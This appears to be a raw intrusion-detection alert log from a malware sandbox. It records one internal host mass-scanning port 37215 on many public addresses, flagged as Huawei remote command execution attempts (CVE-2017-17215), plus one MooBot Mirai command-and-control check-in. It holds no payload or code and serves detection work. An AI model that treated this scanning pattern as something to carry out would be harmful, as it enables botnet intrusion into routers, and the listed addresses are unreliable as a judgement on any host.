                                                    07/10/24-08:26:13.837013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5974237215192.168.2.14157.239.93.130
                                                    07/10/24-08:27:19.161022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5652237215192.168.2.14141.84.132.228
                                                    07/10/24-08:26:34.228514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3657437215192.168.2.14220.28.40.60
                                                    07/10/24-08:27:13.842727TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3632237215192.168.2.1485.114.114.72
                                                    07/10/24-08:27:19.168887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5623037215192.168.2.1441.189.138.151
                                                    07/10/24-08:26:59.662577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5751837215192.168.2.1432.1.206.148
                                                    07/10/24-08:26:14.815685TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3287237215192.168.2.1427.109.189.153
                                                    07/10/24-08:26:14.806143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4401237215192.168.2.14197.79.166.170
                                                    07/10/24-08:26:59.652707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4479037215192.168.2.1441.126.132.100
                                                    07/10/24-08:26:15.793642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5644837215192.168.2.14197.55.10.55
                                                    07/10/24-08:27:14.800548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5463037215192.168.2.1441.87.167.99
                                                    07/10/24-08:26:20.178159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4535637215192.168.2.14157.133.19.146
                                                    07/10/24-08:27:23.893892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3663037215192.168.2.14197.130.118.243
                                                    07/10/24-08:26:23.352655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5157637215192.168.2.1441.98.165.100
                                                    07/10/24-08:27:14.867172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4995237215192.168.2.14220.219.233.220
                                                    07/10/24-08:27:13.974355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4423237215192.168.2.1441.55.85.39
                                                    07/10/24-08:26:25.495020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4398637215192.168.2.141.57.14.117
                                                    07/10/24-08:26:55.386841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3634437215192.168.2.14157.57.141.136
                                                    07/10/24-08:27:20.481124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5876037215192.168.2.14157.34.42.163
                                                    07/10/24-08:26:11.575874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4285837215192.168.2.1441.227.69.31
                                                    07/10/24-08:26:20.122703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4761037215192.168.2.14197.114.179.75
                                                    07/10/24-08:26:49.815817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4702637215192.168.2.1441.183.189.157
                                                    07/10/24-08:27:02.736564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5057637215192.168.2.14197.95.164.78
                                                    07/10/24-08:27:32.587854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3941237215192.168.2.14138.16.159.168
                                                    07/10/24-08:27:31.555849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5867037215192.168.2.14197.140.84.139
                                                    07/10/24-08:27:32.588924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3810837215192.168.2.14157.177.228.90
                                                    07/10/24-08:26:23.348136TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4057637215192.168.2.14115.141.18.161
                                                    07/10/24-08:26:53.157314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4019437215192.168.2.1441.108.224.5
                                                    07/10/24-08:26:25.467971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5553237215192.168.2.14128.238.85.227
                                                    07/10/24-08:27:34.117447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3582237215192.168.2.1441.232.67.75
                                                    07/10/24-08:26:59.851109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3462437215192.168.2.1425.242.38.54
                                                    07/10/24-08:26:42.346552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3282837215192.168.2.1441.36.64.209
                                                    07/10/24-08:26:23.342847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5396237215192.168.2.1499.88.67.211
                                                    07/10/24-08:26:29.755457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5890237215192.168.2.14157.46.41.199
                                                    07/10/24-08:26:25.490164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3598237215192.168.2.1441.88.197.120
                                                    07/10/24-08:26:42.404259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3710437215192.168.2.1451.21.129.41
                                                    07/10/24-08:26:33.151906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5008037215192.168.2.1441.185.116.179
                                                    07/10/24-08:26:20.117679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4361037215192.168.2.1441.20.9.238
                                                    07/10/24-08:26:42.792875TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)529385976192.168.2.1451.79.141.54
                                                    07/10/24-08:26:53.186613TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3286637215192.168.2.1499.151.123.244
                                                    07/10/24-08:26:45.653833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5393437215192.168.2.14197.130.123.220
                                                    07/10/24-08:27:07.389913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4897837215192.168.2.14197.149.90.66
                                                    07/10/24-08:26:33.262115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4116437215192.168.2.1498.129.167.80
                                                    07/10/24-08:26:25.490780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5919037215192.168.2.1441.65.73.52
                                                    07/10/24-08:26:36.441916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5482237215192.168.2.14192.38.208.254
                                                    07/10/24-08:26:38.555542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4022837215192.168.2.1441.110.133.171
                                                    07/10/24-08:26:53.161125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4532237215192.168.2.14157.55.127.206
                                                    07/10/24-08:26:15.803828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4002437215192.168.2.14197.158.129.74
                                                    07/10/24-08:26:57.531122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4052837215192.168.2.14157.34.150.65
                                                    07/10/24-08:27:02.898852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3336237215192.168.2.14197.30.247.157
                                                    07/10/24-08:26:38.592114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5942237215192.168.2.14157.34.145.234
                                                    07/10/24-08:26:18.011354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5507437215192.168.2.14157.79.253.46
                                                    07/10/24-08:26:22.282645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5274837215192.168.2.14157.121.196.155
                                                    07/10/24-08:26:45.636765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5543037215192.168.2.14151.68.226.146
                                                    07/10/24-08:27:14.879570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5067237215192.168.2.14197.187.4.87
                                                    07/10/24-08:26:45.663934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4190837215192.168.2.1441.67.254.102
                                                    07/10/24-08:26:57.536495TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5890637215192.168.2.14197.231.173.207
                                                    07/10/24-08:26:18.012049TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6028637215192.168.2.1459.202.162.173
                                                    07/10/24-08:26:29.820536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4860437215192.168.2.14157.167.69.200
                                                    07/10/24-08:27:34.132992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3374437215192.168.2.14157.141.128.99
                                                    07/10/24-08:26:52.013452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3672637215192.168.2.14168.196.46.247
                                                    07/10/24-08:27:03.001228TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4845037215192.168.2.1441.80.70.24
                                                    07/10/24-08:27:22.896648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5709437215192.168.2.1441.158.91.55
                                                    07/10/24-08:26:52.033039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5516037215192.168.2.14184.224.141.92
                                                    07/10/24-08:27:17.041002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4957837215192.168.2.14197.127.128.208
                                                    07/10/24-08:27:13.956024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5056237215192.168.2.1441.94.45.74
                                                    07/10/24-08:26:29.761571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5130837215192.168.2.14197.141.58.61
                                                    07/10/24-08:27:28.082324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4585037215192.168.2.1441.185.241.200
                                                    07/10/24-08:26:31.081333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3468037215192.168.2.14197.73.221.38
                                                    07/10/24-08:26:15.863530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4910437215192.168.2.1441.75.184.251
                                                    07/10/24-08:27:22.866153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4435637215192.168.2.14197.170.102.116
                                                    07/10/24-08:26:52.073471TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5183837215192.168.2.1441.216.210.125
                                                    07/10/24-08:27:05.190892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5596237215192.168.2.1441.152.212.159
                                                    07/10/24-08:27:32.597902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5102437215192.168.2.14157.219.171.44
                                                    07/10/24-08:27:13.915007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3587637215192.168.2.1441.224.211.137
                                                    07/10/24-08:27:27.108447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4741037215192.168.2.14197.194.152.223
                                                    07/10/24-08:26:11.592748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4135637215192.168.2.1441.35.122.61
                                                    07/10/24-08:27:33.925120TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5384237215192.168.2.1441.55.3.249
                                                    07/10/24-08:27:08.431901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3343037215192.168.2.1449.139.108.148
                                                    07/10/24-08:27:17.078747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5355037215192.168.2.1441.118.195.8
                                                    07/10/24-08:26:43.873718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4287037215192.168.2.14197.110.57.33
                                                    07/10/24-08:27:07.384495TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4355437215192.168.2.14157.117.159.216
                                                    07/10/24-08:26:43.857125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4019637215192.168.2.1441.145.235.95
                                                    07/10/24-08:26:45.669176TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5108637215192.168.2.149.62.97.39
                                                    07/10/24-08:27:08.422156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3850637215192.168.2.14197.244.70.4
                                                    07/10/24-08:27:23.831762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5227637215192.168.2.14157.194.162.159
                                                    07/10/24-08:26:25.418573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5042037215192.168.2.14150.162.239.60
                                                    07/10/24-08:27:19.239106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5982837215192.168.2.14163.213.108.254
                                                    07/10/24-08:27:33.769630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4484637215192.168.2.14198.109.60.141
                                                    07/10/24-08:27:10.636807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4139237215192.168.2.14157.31.99.116
                                                    07/10/24-08:26:38.584651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3743237215192.168.2.14157.83.169.134
                                                    07/10/24-08:26:15.849437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4006837215192.168.2.14131.42.124.25
                                                    07/10/24-08:26:47.919508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3520237215192.168.2.1425.14.37.173
                                                    07/10/24-08:26:15.809850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3816237215192.168.2.14197.211.95.44
                                                    07/10/24-08:26:13.798574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5733637215192.168.2.14223.189.137.228
                                                    07/10/24-08:26:36.381713TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5689837215192.168.2.14157.206.62.91
                                                    07/10/24-08:27:31.558138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4494437215192.168.2.14197.4.249.208
                                                    07/10/24-08:26:34.269822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6042437215192.168.2.14134.31.242.146
                                                    07/10/24-08:26:20.148886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5454637215192.168.2.1441.140.166.42
                                                    07/10/24-08:26:43.907238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5470237215192.168.2.1441.73.83.116
                                                    07/10/24-08:27:17.034808TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5105437215192.168.2.14197.192.237.192
                                                    07/10/24-08:27:19.287568TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3672037215192.168.2.14157.53.99.104
                                                    07/10/24-08:26:41.576208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6038437215192.168.2.1441.71.73.33
                                                    07/10/24-08:27:33.761946TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5392437215192.168.2.14166.153.137.121
                                                    07/10/24-08:26:28.842346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6005237215192.168.2.14197.184.166.119
                                                    07/10/24-08:26:11.587895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3837237215192.168.2.14197.10.15.85
                                                    07/10/24-08:27:07.393645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4467037215192.168.2.1441.245.94.53
                                                    07/10/24-08:26:41.592931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5046637215192.168.2.14109.103.189.134
                                                    07/10/24-08:26:41.419620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4132237215192.168.2.1441.207.16.231
                                                    07/10/24-08:26:25.443386TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3633637215192.168.2.148.48.251.123
                                                    07/10/24-08:27:33.934356TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4547037215192.168.2.14197.83.233.65
                                                    07/10/24-08:27:14.002170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5422837215192.168.2.14157.197.175.86
                                                    07/10/24-08:27:28.045782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5256237215192.168.2.14157.250.244.5
                                                    07/10/24-08:27:23.773863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4963837215192.168.2.14197.232.7.196
                                                    07/10/24-08:26:13.787067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5107037215192.168.2.14223.169.203.255
                                                    07/10/24-08:26:25.518059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5720037215192.168.2.14178.210.208.107
                                                    07/10/24-08:26:33.151266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3669237215192.168.2.1441.203.105.89
                                                    07/10/24-08:26:13.655668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3543837215192.168.2.1441.98.73.252
                                                    07/10/24-08:26:38.567555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3281837215192.168.2.14197.66.89.239
                                                    07/10/24-08:27:19.151006TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3586437215192.168.2.14124.50.32.183
                                                    07/10/24-08:26:28.855166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5473837215192.168.2.1441.82.199.175
                                                    07/10/24-08:27:32.548178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4806437215192.168.2.1441.146.102.53
                                                    07/10/24-08:27:08.415369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4776637215192.168.2.14197.92.9.190
                                                    07/10/24-08:26:57.517659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4157037215192.168.2.1441.49.63.103
                                                    07/10/24-08:26:51.952619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4686437215192.168.2.14157.73.27.169
                                                    07/10/24-08:26:14.819736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6078237215192.168.2.14157.208.77.12
                                                    07/10/24-08:27:05.213994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3316837215192.168.2.14148.101.45.8
                                                    07/10/24-08:27:13.985222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4556637215192.168.2.14170.97.121.39
                                                    07/10/24-08:26:13.794686TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5519037215192.168.2.1452.42.76.224
                                                    07/10/24-08:26:38.544171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4132637215192.168.2.14197.231.58.78
                                                    07/10/24-08:27:30.456446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5819437215192.168.2.14167.16.194.137
                                                    07/10/24-08:26:45.684661TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4445437215192.168.2.14157.242.164.127
                                                    07/10/24-08:27:27.161744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3996837215192.168.2.1450.101.207.107
                                                    07/10/24-08:26:34.209282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5746237215192.168.2.14157.143.36.249
                                                    07/10/24-08:27:11.526657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5207437215192.168.2.14180.4.124.132
                                                    07/10/24-08:27:24.962148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4702037215192.168.2.14197.91.119.251
                                                    07/10/24-08:26:55.405886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4184837215192.168.2.1436.131.64.88
                                                    07/10/24-08:26:33.243184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4150237215192.168.2.14157.168.54.175
                                                    07/10/24-08:26:41.443914TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4769837215192.168.2.14197.221.238.117
                                                    07/10/24-08:26:14.623181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5786837215192.168.2.14210.39.66.100
                                                    07/10/24-08:26:15.873378TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4487037215192.168.2.14157.38.49.193
                                                    07/10/24-08:26:11.659473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5800237215192.168.2.14157.25.128.159
                                                    07/10/24-08:26:59.774458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3678637215192.168.2.14157.170.92.46
                                                    07/10/24-08:27:33.802521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3938037215192.168.2.14197.181.61.105
                                                    07/10/24-08:27:33.925119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4530837215192.168.2.1441.80.222.46
                                                    07/10/24-08:26:15.844473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5443837215192.168.2.14157.74.21.91
                                                    07/10/24-08:26:38.658229TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3510037215192.168.2.14157.7.22.169
                                                    07/10/24-08:26:28.758809TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5109237215192.168.2.1441.182.174.207
                                                    07/10/24-08:26:43.543257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4731837215192.168.2.14197.55.90.227
                                                    07/10/24-08:27:22.539034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4912637215192.168.2.1441.115.43.223
                                                    07/10/24-08:26:41.570262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4338237215192.168.2.14173.228.193.112
                                                    07/10/24-08:26:25.486386TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4815237215192.168.2.14197.198.238.68
                                                    07/10/24-08:26:59.610357TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5437237215192.168.2.1441.126.208.1
                                                    07/10/24-08:27:02.986988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5635037215192.168.2.14157.163.169.251
                                                    07/10/24-08:26:22.239917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4369437215192.168.2.1441.44.18.182
                                                    07/10/24-08:26:41.413310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5756837215192.168.2.14163.69.26.23
                                                    07/10/24-08:26:59.848690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4851037215192.168.2.14157.198.168.86
                                                    07/10/24-08:27:31.463838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4729037215192.168.2.14197.26.141.209
                                                    07/10/24-08:27:11.551347TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4243837215192.168.2.14194.232.221.104
                                                    07/10/24-08:27:23.781687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3291237215192.168.2.14197.102.27.210
                                                    07/10/24-08:26:38.645835TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4721637215192.168.2.14213.199.192.43
                                                    07/10/24-08:26:42.426350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5794037215192.168.2.14197.140.97.79
                                                    07/10/24-08:27:10.625884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4841837215192.168.2.14157.151.178.216
                                                    07/10/24-08:27:11.612817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3399637215192.168.2.14177.51.62.7
                                                    07/10/24-08:26:13.655669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5262237215192.168.2.14211.46.225.222
                                                    07/10/24-08:26:47.943486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4174237215192.168.2.14197.116.255.48
                                                    07/10/24-08:27:24.970064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6056237215192.168.2.14157.49.130.88
                                                    07/10/24-08:26:57.619989TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3338437215192.168.2.1474.99.137.247
                                                    07/10/24-08:26:55.366759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4604237215192.168.2.1450.255.91.247
                                                    07/10/24-08:26:31.065824TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5221237215192.168.2.14157.33.156.238
                                                    07/10/24-08:26:13.830759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5783237215192.168.2.14157.41.198.23
                                                    07/10/24-08:26:17.945424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6061237215192.168.2.14197.174.123.222
                                                    07/10/24-08:26:47.948537TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4632637215192.168.2.1441.122.100.253
                                                    07/10/24-08:26:11.592748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5923837215192.168.2.1481.152.255.200
                                                    07/10/24-08:26:11.593481TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3801437215192.168.2.14157.133.236.121
                                                    07/10/24-08:27:08.397659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4226037215192.168.2.1441.193.171.158
                                                    07/10/24-08:26:38.594738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5157837215192.168.2.1441.197.29.140
                                                    07/10/24-08:27:14.667956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4153237215192.168.2.1441.65.170.123
                                                    07/10/24-08:26:33.175364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5577037215192.168.2.1441.44.32.165
                                                    07/10/24-08:26:15.849080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4176437215192.168.2.1441.116.31.64
                                                    07/10/24-08:26:26.441172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5745037215192.168.2.14102.58.215.83
                                                    07/10/24-08:26:36.358429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5020437215192.168.2.14197.49.180.164
                                                    07/10/24-08:27:20.428275TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3492037215192.168.2.14171.150.224.159
                                                    07/10/24-08:27:11.501103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3503237215192.168.2.14157.173.28.226
                                                    07/10/24-08:27:23.904429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3666637215192.168.2.14133.98.30.115
                                                    07/10/24-08:27:22.799861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5963037215192.168.2.1441.106.85.88
                                                    07/10/24-08:26:43.649777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4917437215192.168.2.14109.80.189.203
